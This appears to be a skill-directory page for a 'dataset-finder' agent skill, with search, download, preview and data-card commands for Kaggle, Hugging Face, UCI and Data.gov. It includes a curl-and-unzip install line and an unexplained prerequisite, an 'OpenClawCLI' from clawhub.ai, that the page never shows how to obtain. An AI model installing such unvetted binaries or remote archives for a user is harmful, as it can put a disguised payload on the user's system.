dataset-finder
Use this skill when users need to search for datasets, download data files, or explore data repositories. Triggers include: requests to "find datasets", "search for data", "download dataset from Kaggle", "get data from Hugging Face", "find ML datasets", or mentions of data repositories like Kaggle, UCI ML Repository, Data.gov, or Hugging Face. Also use for previewing dataset statistics, generating data cards, or discovering datasets for machine learning projects. Requires OpenClawCLI installation from clawhub.ai.
Install
mkdir -p .claude/skills/dataset-finder && curl -L -o skill.zip "https://mcp.directory/api/skills/download/5555" && unzip -o skill.zip -d .claude/skills/dataset-finder && rm skill.zipInstalls to .claude/skills/dataset-finder
About this skill
Dataset Finder
Search, download, and explore datasets from multiple repositories including Kaggle, Hugging Face, UCI ML Repository, and Data.gov. Preview statistics, generate data cards, and manage datasets for machine learning projects.
⚠️ Prerequisite: Install OpenClawCLI (Windows, MacOS)
Installation:
# Standard installation
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
# If you encounter permission errors, use a virtual environment
python -m venv venv
source venv/bin/activate # On Windows: venv\Scripts\activate
pip install kaggle datasets pandas huggingface-hub requests beautifulsoup4
Never use --break-system-packages as it can damage your system's Python installation.
Quick Reference
| Task | Command |
|---|---|
| Search Kaggle | python scripts/dataset.py kaggle search "housing prices" |
| Download Kaggle dataset | python scripts/dataset.py kaggle download "username/dataset-name" |
| Search Hugging Face | python scripts/dataset.py huggingface search "sentiment" |
| Download HF dataset | python scripts/dataset.py huggingface download "dataset-name" |
| Search UCI ML | python scripts/dataset.py uci search "classification" |
| Preview dataset | python scripts/dataset.py preview dataset.csv |
| Generate data card | python scripts/dataset.py datacard dataset.csv --output README.md |
| List local datasets | python scripts/dataset.py list |
Core Features
1. Multi-Repository Search
Search across multiple data repositories from a single interface.
Supported Sources:
- Kaggle - ML competitions and community datasets
- Hugging Face - NLP, vision, and audio datasets
- UCI ML Repository - Classic ML datasets
- Data.gov - US government open data
- Local - Manage downloaded datasets
2. Dataset Download
Download datasets with automatic format detection.
Supported formats:
- CSV, TSV
- JSON, JSONL
- Parquet
- Excel (XLSX, XLS)
- ZIP archives
- HDF5
- Feather
3. Dataset Preview
Get quick statistics and insights without loading entire datasets.
Preview features:
- Shape (rows × columns)
- Column names and types
- Missing value counts
- Basic statistics (mean, std, min, max)
- Memory usage
- Sample rows
4. Data Card Generation
Automatically generate dataset documentation.
Includes:
- Dataset description
- Schema information
- Statistics summary
- Usage examples
- License information
- Citation details
Repository-Specific Commands
Kaggle
Search and download datasets from Kaggle.
Setup:
- Get Kaggle API credentials from https://www.kaggle.com/settings
- Place
kaggle.jsonin~/.kaggle/(Linux/Mac) or%USERPROFILE%\.kaggle\(Windows)
# Search datasets
python scripts/dataset.py kaggle search "house prices"
# Search with filters
python scripts/dataset.py kaggle search "NLP" --file-type csv --sort-by hotness
# Download dataset
python scripts/dataset.py kaggle download "zillow/zecon"
# Download specific files
python scripts/dataset.py kaggle download "username/dataset" --file "train.csv"
# List dataset files
python scripts/dataset.py kaggle list "username/dataset-name"
Search options:
--file-type- Filter by file type (csv, json, etc.)--license- Filter by license type--sort-by- Sort by hotness, votes, updated, or relevance--max-results- Limit number of results
Output:
1. House Prices - Advanced Regression Techniques
Owner: zillow/zecon
Size: 1.5 MB
Last updated: 2023-06-15
Downloads: 150,000+
URL: https://www.kaggle.com/datasets/zillow/zecon
2. Housing Prices Dataset
Owner: username/housing-data
Size: 850 KB
Last updated: 2023-08-20
Downloads: 50,000+
URL: https://www.kaggle.com/datasets/username/housing-data
Hugging Face Datasets
Search and download datasets from Hugging Face Hub.
# Search datasets
python scripts/dataset.py huggingface search "sentiment analysis"
# Search with filters
python scripts/dataset.py huggingface search "NLP" --task text-classification --language en
# Download dataset
python scripts/dataset.py huggingface download "imdb"
# Download specific split
python scripts/dataset.py huggingface download "imdb" --split train
# Download specific configuration
python scripts/dataset.py huggingface download "glue" --config mrpc
# Stream large datasets
python scripts/dataset.py huggingface download "large-dataset" --streaming
Search options:
--task- Filter by task (text-classification, translation, etc.)--language- Filter by language code--multimodal- Include multimodal datasets--benchmark- Only benchmark datasets--max-results- Limit results
Output:
1. IMDB Movie Reviews
Dataset ID: imdb
Tasks: sentiment-classification
Languages: en
Size: 84.1 MB
Downloads: 1M+
URL: https://huggingface.co/datasets/imdb
2. Stanford Sentiment Treebank
Dataset ID: sst2
Tasks: sentiment-classification
Languages: en
Size: 7.4 MB
Downloads: 500K+
URL: https://huggingface.co/datasets/sst2
UCI ML Repository
Search and download classic ML datasets.
# Search datasets
python scripts/dataset.py uci search "classification"
# Search by characteristics
python scripts/dataset.py uci search "regression" --min-samples 1000
# Download dataset
python scripts/dataset.py uci download "iris"
# Download with metadata
python scripts/dataset.py uci download "wine-quality" --include-metadata
Search options:
--task-type- classification, regression, clustering--min-samples- Minimum number of instances--min-features- Minimum number of features--data-type- tabular, text, image, time-series
Output:
1. Iris Dataset
ID: iris
Task: classification
Samples: 150
Features: 4
Classes: 3
Missing values: No
URL: https://archive.ics.uci.edu/ml/datasets/iris
2. Wine Quality
ID: wine-quality
Task: classification/regression
Samples: 6497
Features: 11
Missing values: No
URL: https://archive.ics.uci.edu/ml/datasets/wine+quality
Data.gov
Search US government open data.
# Search datasets
python scripts/dataset.py datagov search "census"
# Search with organization filter
python scripts/dataset.py datagov search "health" --organization "cdc.gov"
# Search by topic
python scripts/dataset.py datagov search "education" --tags "schools,students"
# Download dataset
python scripts/dataset.py datagov download "dataset-id"
Search options:
--organization- Filter by publishing organization--tags- Filter by tags (comma-separated)--format- Filter by format (csv, json, xml, etc.)--max-results- Limit results
Output:
1. 2020 Census Demographic Data
Organization: census.gov
Format: CSV
Size: 125 MB
Last updated: 2023-01-15
Tags: census, demographics, population
URL: https://catalog.data.gov/dataset/...
Dataset Management
Preview Datasets
Get quick insights without loading entire datasets.
# Basic preview
python scripts/dataset.py preview data.csv
# Detailed statistics
python scripts/dataset.py preview data.csv --detailed
# Custom sample size
python scripts/dataset.py preview data.csv --sample 20
# Multiple files
python scripts/dataset.py preview train.csv test.csv
Output:
Dataset: train.csv
Shape: 1000 rows × 15 columns
Size: 2.5 MB
Memory usage: 120 KB
Columns:
- id (int64): no missing values
- name (object): 5 missing values
- age (int64): no missing values
- income (float64): 12 missing values
- category (object): no missing values
Numeric columns statistics:
age income
count 1000.0 988.0
mean 35.2 65432.1
std 12.5 25000.0
min 18.0 20000.0
max 75.0 150000.0
Categorical columns:
- category: 5 unique values
- name: 995 unique values
Sample (first 5 rows):
id name age income category
0 1 John Doe 35 65000.0 A
1 2 Jane Doe 28 55000.0 B
2 3 Bob Smith 42 85000.0 A
...
Generate Data Cards
Create standardized dataset documentation.
# Generate data card
python scripts/dataset.py datacard dataset.csv --output DATACARD.md
# Include statistics
python scripts/dataset.py datacard dataset.csv --include-stats --output README.md
# Custom template
python scripts/dataset.py datacard dataset.csv --template custom_template.md
# Multiple datasets
python scripts/dataset.py datacard train.csv test.csv --output-dir datacards/
Generated data card includes:
- Dataset description
- File information (size, format, rows, columns)
- Schema (column names, types, descriptions)
- Statistics (distributions, missing values, correlations)
- Sample data
- Usage examples
- License and citation
- Known issues/limitations
Example output (DATACARD.md):
# Dataset Card: Housing Prices
## Dataset Description
This dataset contains housing prices and features for regression analysis.
## Dataset Information
- **Format:** CSV
- **Size:** 1.2 MB
- **Rows:** 1,460
- **Columns:** 81
## Schema
| Column | Type | Description | Missing |
|--------|------|-------------|---------|
| Id | int64 | Unique identifier | 0 |
| MSSubClass | int64 | Building class | 0 |
| LotArea | int64 | Lot size in sq ft | 0 |
| SalePrice | int64 | Sale price | 0 |
...
## Statistics
- Numerical features: 38
- Categorical features: 43
- Missing values: 19 columns affected
- Target variable: SalePrice (range: $34,900 - $755,000)
## Usage
```python
import pandas as pd
df = pd.read_csv('housing_prices.csv')
License
Creative Commons
### List Local Datasets
Manage downloaded datasets.
```bash
# List all datasets
python scripts/dataset.py list
# List with details
python scripts/dataset.py list --detailed
# Filter by source
python scripts/dataset.py list --so
---
*Content truncated.*
More by openclaw
View all skills by openclaw →You might also like
flutter-development
aj-geddes
Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.
drawio-diagrams-enhanced
jgtolentino
Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.
ui-ux-pro-max
nextlevelbuilder
"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."
godot
bfollington
This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.
nano-banana-pro
garg-aayush
Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.
fastapi-templates
wshobson
Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.
Related MCP Servers
Browse all serversHeyOnCall sends automated phone notifications via a hosted paging service to alert on-call teams when long-running tasks
Effortlessly manage Google Cloud with this user-friendly multi cloud management platform—simplify operations, automate t
Effortlessly deploy static sites with EdgeOne Pages—an easy, scalable alternative to Amazon website hosting for fast, re
Rtfmbro is an MCP server for config management tools—get real-time, version-specific docs from GitHub for Python, Node.j
AI Intervention Agent enables human-in-the-loop AI with real-time intervention via a web UI—review context, give feedbac
Enhance productivity with customizable audio notifications in your development environment. Ideal for game dev softwares
Stay ahead of the MCP ecosystem
Get weekly updates on new skills and servers.